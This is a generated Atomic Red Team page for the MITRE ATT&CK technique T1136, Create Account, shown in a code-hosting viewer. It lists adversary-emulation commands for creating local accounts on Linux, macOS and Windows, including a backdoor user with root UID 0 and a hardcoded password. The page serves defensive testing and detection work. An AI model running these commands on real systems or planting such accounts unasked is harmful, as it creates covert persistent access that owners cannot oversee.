security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1663bf7d524b6fc8a9a39104feb2949b36368dfc
atomic-red-team/atomics/T1136/T1136.md
T
CircleCI Atomic Red Team doc generator 91e86258e6 Generate docs from job=validate_atomics_generate_docs branch=master
2019-10-24 17:09:43 +00:00

143 lines
4.2 KiB
Markdown
Raw Blame History

# T1136 - Create Account
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1136)
<blockquote>Adversaries with a sufficient level of access may create a local system, domain, or cloud tenant account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.
### Windows
The <code>net user</code> commands can be used to create a local or domain account.
### Office 365
An adversary with access to a Global Admin account can create another account and assign it the Global Admin role for persistent access to the Office 365 tenant.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)</blockquote>
## Atomic Tests
- [Atomic Test #1 - Create a user account on a Linux system](#atomic-test-1---create-a-user-account-on-a-linux-system)
- [Atomic Test #2 - Create a user account on a MacOS system](#atomic-test-2---create-a-user-account-on-a-macos-system)
- [Atomic Test #3 - Create a new user in a command prompt](#atomic-test-3---create-a-new-user-in-a-command-prompt)
- [Atomic Test #4 - Create a new user in PowerShell](#atomic-test-4---create-a-new-user-in-powershell)
- [Atomic Test #5 - Create a new user in Linux with `root` UID and GID.](#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid)
<br/>
## Atomic Test #1 - Create a user account on a Linux system
Create a user via useradd
**Supported Platforms:** Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | evil_user|
| comment | Comment to record when creating the user | String | Evil Account|
#### Run it with `bash`!
```
useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
```
<br/>
<br/>
## Atomic Test #2 - Create a user account on a MacOS system
Creates a user on a MacOS system with dscl
**Supported Platforms:** macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | evil_user|
| realname | 'realname' to record when creating the user | String | Evil Account|
#### Run it with `bash`!
```
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/bash
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
```
<br/>
<br/>
## Atomic Test #3 - Create a new user in a command prompt
Creates a new user in a command prompt
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | Evil Account|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
net user /add #{username}
```
<br/>
<br/>
## Atomic Test #4 - Create a new user in PowerShell
Creates a new user in PowerShell
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | Evil Account|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
New-LocalUser -Name #{username} -NoPassword
net user /add #{username}
```
<br/>
<br/>
## Atomic Test #5 - Create a new user in Linux with `root` UID and GID.
Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign.
**Supported Platforms:** Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | butter|
| password | Password of the user to create | String | BetterWithButter|
#### Run it with `bash`!
```
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
echo "#{password}" | passwd --stdin #{username}
```
<br/>
Reference in New Issue View Git Blame Copy Permalink